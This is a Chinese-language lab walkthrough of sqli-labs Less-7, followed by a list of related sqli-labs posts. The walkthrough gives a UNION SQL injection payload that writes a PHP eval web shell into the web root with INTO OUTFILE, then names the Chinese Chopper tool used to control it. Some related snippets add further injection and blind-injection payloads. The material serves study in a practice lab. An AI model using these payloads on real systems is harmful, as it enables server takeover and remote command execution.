SQLI DUMB SERIES-7
(1)查看PHP源代码
可以看见输入的id被一对单引号和两对圆括号包围
(2)根据提示:Dump into Outfile可知,此次攻击需要导出文件
(3)在第一关获取
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
?id=2' union select 1,@@datadir,@@basedir --+
(4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini)
(5)payload如下
?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+
尽管显示错误,但在所写目录里有已经写好了文件
(6)运行中国菜刀
至此,攻击完成!
转载于:https://www.cnblogs.com/momoli/p/10678048.html
SQLI DUMB SERIES-7相关推荐
- SQLI DUMB SERIES-8
SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显 则我们使用盲注 盲注分为几种 布尔型盲注 Length() //返回字符串长度 Substr() //取字符串 用法 ...
- SQLI DUMB SERIES-1-2
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag.现在就是去探索方法 首先我们要知道不管什么数据库注入,检测是否有注入点是第一步 第一题 1.提示输 ...
- SQLI DUMB SERIES-10
第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sl ...
- SQLI DUMB SERIES-2
SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_con ...
- SQLI DUMB SERIES-4
?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...
- SQLI DUMB SERIES-5
less5 (1)输入单引号,回显错误,说明存在注入点.输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了:可以使用报错注入,有两种方式 ...
- SQLI DUMB SERIES-16
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15. ...
- SQLI DUMB SERIES-3
?id=1') 构造闭合 ?id=1') --+ 注释后面内容 ?id=1') order by 4–+ 4报错 3不报错 故有3列 ?id=-1') union all select 1,2,3 f ...
- SQLI DUMB SERIES-1
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: ...
最新文章
- 0基础玩转CV的利器绝了,还送万元礼金,机不可失!
- STM32-RCC内部总线时钟设置程序详讲
- Focal Loss和它背后的男人RetinaNet
- qeephp 修改acl.yaml文件实现访问控制
- Mapped Statements collection does not contain value for TaskMapper.selectByPrimaryKey
- 教育部:中小学生原则上不得将个人手机带入校园!不要相信手机对学习有帮助!
- 乡村要振兴,快递先进村?
- php单表显示动态下拉框,PHP:使用optgroup动态下拉列表
- Forms身份验证基本原理
- Anaconda 完全入门指南
- 【华为云技术分享】小熊派华为物联网操作系统LiteOS裸机驱动移植02-LCD驱动移植及使用
- 51单片机的轮胎气压监测系统_汽车的胎压监测系统有哪些作用?
- 2007-11-22 21:24 大端(Big Endian)与小端(Little Endian)详解
- python中国官网-中蟒 (中文 Python) 編程語言網站 chinesepython
- 肤色检测一例-使用rgb颜色模型
- Java JDK 配置环境变量
- R语言metafor包预后meta分析复现
- 空间变换与计算_02_3x3矩阵
- 使用Flurry来统计和分析用户行为
- 《国度》之大学者联盟全解
热门文章
- Java — 慎用Executors类中newFixedThreadPool()和newCachedThreadPool()
- Android 8.0 Activity启动流程分析
- 第十一周项目2--定义点类
- gitea 1.16.8 忘记口令的处理思路
- 技术狂潮下的生理性健忘:科技产品如何影响我们的大脑?
- Java多线程-任务拒绝策略
- 什么是知识,什么是知识图谱,有什么作用,有哪些应用领域?
- springBoot企业微信引入会话存档SDK
- 文件服务器 u口共享,轻松搭建专业级FTP文件共享服务器
- 在html5中,用于获得用户当前位置的方法